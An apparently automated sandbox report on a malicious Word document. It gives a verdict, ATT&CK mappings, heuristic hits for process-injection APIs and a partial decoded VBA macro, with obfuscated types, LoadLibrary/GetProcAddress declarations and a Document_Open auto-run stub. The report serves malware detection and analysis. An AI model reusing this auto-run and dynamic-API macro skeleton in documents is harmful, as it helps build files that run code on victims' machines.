Verdict: MALICIOUS
Risk Score: 290
Malware Insights
MITRE ATT&CK
- T1059.005 Visual Basic
- T1204.002 Malicious File
- T1105 Ingress Tool Transfer
The sample is a malicious Office document containing a VBA macro that executes when the document is opened. The macro references Windows API functions such as CreateProcess, VirtualAlloc, WriteProcessMemory, and CreateRemoteThread, indicating an attempt to load and execute a second-stage payload. The presence of a Document_Open macro and references to LoadLibrary and GetProcAddress further support this. The exact payload and its destination are not directly discernible from the provided evidence.
Heuristics (9)
- Reference to WriteProcessMemory API (critical, SC_STR_WRITEPROCESSMEMORY): Reference to WriteProcessMemory API
- Reference to CreateRemoteThread API (critical, SC_STR_CREATEREMOTETHREAD): Reference to CreateRemoteThread API
- Reference to CreateProcess API (high, SC_STR_CREATEPROCESS): Reference to CreateProcess API
- Reference to LoadLibrary API (high, SC_STR_LOADLIBRARY): Reference to LoadLibrary API
- Reference to GetProcAddress API (high, SC_STR_GETPROCADDRESS): Reference to GetProcAddress API
- Reference to VirtualAlloc API (medium, SC_STR_VIRTUALALLOC): Reference to VirtualAlloc API
- VBA macros detected (medium, OLE_VBA_MACROS, 1 related finding): Document contains VBA macro code
- Document_Open macro (low, OLE_VBA_DOCOPEN): Document_Open macro. Matched line in script: `Sub Document_Open()`
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 1397 bytes | f3235698e42443cca044e7e14e3a8340a4f0deca1df95811e4aa86316af114f8 |
Preview script (first 1,000 lines of the extracted script):

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' User-defined types with randomised member names. The field count and
' widths match the Win32 PROCESS_INFORMATION (4 x DWORD/HANDLE) and
' STARTUPINFO (18 fields, two of them WORD) structures that CreateProcess
' expects, consistent with the CreateProcess reference noted above.
Private Type PROC
ZEnRYEL As Long
mhhsUzo As Long
cACtzcH As Long
ChnpYwt As Long
End Type
Private Type INFO
ppFnQhc As Long
cACtzcH As String
ZLSaait As String
iSeyHpq As String
AhBCTbE As Long
JCSZRqE As Long
GvjZtDZ As Long
DlAXgbr As Long
MokGgKj As Long
hbCYiGg As Long
parRilo As Long
UXaPWID As Long
dSYmUJX As Integer
YWNZiiS As Integer
vljwxCW As Long
xChGlfJ As Long
itwVpab As Long
qqJmWHg As Long
End Type
' Dynamic API resolution: LoadLibrary/GetProcAddress let the macro look up
' further Windows APIs by name at run time instead of declaring them here.
#If VBA7 Then
Private Declare PtrSafe Function LoadLibrary Lib "kernel32" Alias "LoadLibraryA" (ByVal lpLibFileName As String) As Long
Private Declare PtrSafe Function GetProcAddress Lib "kernel32" (ByVal hModule As Long, ByVal lpProcName As String) As Long
#Else
Private Declare Function LoadLibrary Lib "kernel32" Alias "LoadLibraryA" (ByVal lpLibFileName As String) As Long
Private Declare Function GetProcAddress Lib "kernel32" (ByVal hModule As Long, ByVal lpProcName As String) As Long
#End If
' Auto-execution entry point: runs as soon as the document is opened.
' The called routine Eiebv is not included in this preview.
Sub Document_Open()
Call Eiebv
End Sub
```